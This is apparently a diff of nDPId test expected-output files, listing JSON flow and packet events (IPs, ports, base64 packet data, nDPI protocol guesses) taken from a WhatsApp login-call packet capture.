MTQ3MjY1OCwgNTExNzA2NjQyLCA1NjgzOTU4MzMsIDU5NDI0Njk1NCwgNTk4MDYxMDY2LCA2MTU5ODMzNzksIDcyMDA1ODM2MSwgNzM1MDUxODMwLCA3MzYzNDE1MjgsIDc0MTI1NTYxMywgNzc2MDg3MjQ3LCA3ODA4NzA1ODEsIDc4Mjk4MTk0OSwgNzg1MjY2MTc3LCA4MTg3NTI3MTAsIDg1NTY4MjM5MCwgODg0MTIwMTMyLCA5MDg5MTQ4NjhdfQ=="} 
00516{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1197,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":1432582324191,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1432582324191,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAABIJmQAAEARzfDAqAIBwKgC\/+EV4RUANKgAU3BvdFVkcDCYJeGQmjjiDQABAARIlcID1NylhjSgAeWF26p2NNVFJFGe2SE="} -00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1198,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582331561,"flow_last_seen":1432582331561,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582331561,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.167.142.39","src_port":49197,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1198,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1432582331561,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582331561,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAowcFAAEAGFpTAqAIEEaeOJ8AtAbtkgHfvejCYYFAR\/\/+cbwAA"} 
-00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1200,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":2,"flow_last_seen":1432582331698,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582331698,"pkt":"APS5Jrv0xiwDYGpkCABFAAAo+xwAAO0GcDgRp44nwKgCBAG7wC16MJhgZIB38FARn\/78bwAA"} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1203,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":3,"flow_last_seen":1432582331825,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582331825,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAo40dAAEAG9Q3AqAIEEaeOJ8AtAbtkgHfwejCYYVAQ\/\/6cbwAA"} -00661{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1207,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582224235,"flow_last_seen":1432582224264,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582341039,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"5.178.42.26","src_port":49174,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1207,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582224235,"flow_last_seen":1432582224264,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582341039,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"5.178.42.26","src_port":49174,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00663{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1207,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582224210,"flow_last_seen":1432582224240,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582341039,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"93.186.135.82","src_port":49173,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1207,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582224210,"flow_last_seen":1432582224240,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582341039,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"93.186.135.82","src_port":49173,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1207,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582223077,"flow_last_seen":1432582223379,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582341039,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.154.66.111","src_port":49163,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} -00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1207,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582223077,"flow_last_seen":1432582223379,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582341039,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.154.66.111","src_port":49163,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1207,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582223075,"flow_last_seen":1432582223379,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582341039,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.154.66.121","src_port":49166,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 
-00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1207,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582223075,"flow_last_seen":1432582223379,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582341039,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.154.66.121","src_port":49166,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1207,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582225329,"flow_last_seen":1432582225381,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582341039,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.130.137.77","src_port":49176,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} -00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1207,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582225329,"flow_last_seen":1432582225381,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582341039,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.130.137.77","src_port":49176,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1207,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1432582224230,"flow_last_seen":1432582224260,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":85,"flow_avg_l4_payload_len":17,"midstream":1,"thread_ts_msec":1432582341039,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"23.50.148.228","src_port":49172,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00592{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1207,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1432582224230,"flow_last_seen":1432582224260,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":85,"flow_avg_l4_payload_len":17,"midstream":1,"thread_ts_msec":1432582341039,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"23.50.148.228","src_port":49172,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1207,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582227884,"flow_last_seen":1432582228167,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1432582341039,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.178.104.14","src_port":49203,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 
-00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1207,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582227884,"flow_last_seen":1432582228167,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1432582341039,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.178.104.14","src_port":49203,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1207,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582225324,"flow_last_seen":1432582225533,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582341039,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.55","src_port":49165,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} -00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1207,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582225324,"flow_last_seen":1432582225533,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582341039,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.55","src_port":49165,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1207,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582225313,"flow_last_seen":1432582225533,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582341039,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.53","src_port":49175,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} -00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1207,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582225313,"flow_last_seen":1432582225533,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582341039,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.53","src_port":49175,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1207,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582224208,"flow_last_seen":1432582224417,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582341039,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49169,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 
-00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1207,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582224208,"flow_last_seen":1432582224417,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582341039,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49169,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1217,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582355253,"flow_last_seen":1432582355253,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1432582355253,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49205,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1217,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1432582355253,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1432582355253,"pkt":"xiwDYGpkAPS5Jrv0CABFAABAz7ZAAEAGVELAqAIEEa1CZsA1Abt+ckUjAAAAALAC\/\/9LOwAAAgQFtAEDAwQBAQgKLfwhgQAAAAAEAgAA"} 
-00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1218,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1432582355393,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582355393,"pkt":"APS5Jrv0xiwDYGpkCABFAAA009MAAO8G4TARrUJmwKgCBAG7wDWkxiaffnJFJIASH\/7nbQAAAgQFoAEDAwQBAQQC"} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1219,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":1432582355478,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582355478,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAoTu9AAEAG1SHAqAIEEa1CZsA1Abt+ckUkpMYmoFAQQAAIJwAA"} -00992{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1220,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432582355253,"flow_last_seen":1432582355482,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1432582355482,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49205,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.AppleStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p53-buy.itunes.apple.com","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-01033{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1222,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1432582355253,"flow_last_seen":1432582355622,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1432582355622,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49205,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.AppleStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p53-buy.itunes.apple.com","ja3":"799135475da362592a4be9199d258726","ja3s":"c253ec3ad88e42f8da4032682892f9a0","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} -00663{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1432582233314,"flow_last_seen":1432582233518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"93.186.135.8","src_port":49192,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1432582233314,"flow_last_seen":1432582233518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"93.186.135.8","src_port":49192,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582235999,"flow_last_seen":1432582236282,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.59","src_port":49180,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} -00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582235999,"flow_last_seen":1432582236282,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.59","src_port":49180,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582235998,"flow_last_seen":1432582236282,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.37","src_port":49181,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} -00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582235998,"flow_last_seen":1432582236282,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.37","src_port":49181,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582234869,"flow_last_seen":1432582235028,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.52","src_port":49182,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 
-00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582234869,"flow_last_seen":1432582235028,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.52","src_port":49182,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582233751,"flow_last_seen":1432582233926,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.49","src_port":49191,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} -00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582233751,"flow_last_seen":1432582233926,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.49","src_port":49191,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1198,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582331561,"flow_last_seen":1432582331561,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582331561,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.167.142.39","src_port":49197,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1198,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1432582331561,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582331561,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAowcFAAEAGFpTAqAIEEaeOJ8AtAbtkgHfvejCYYFAR\/\/+cbwAA"} 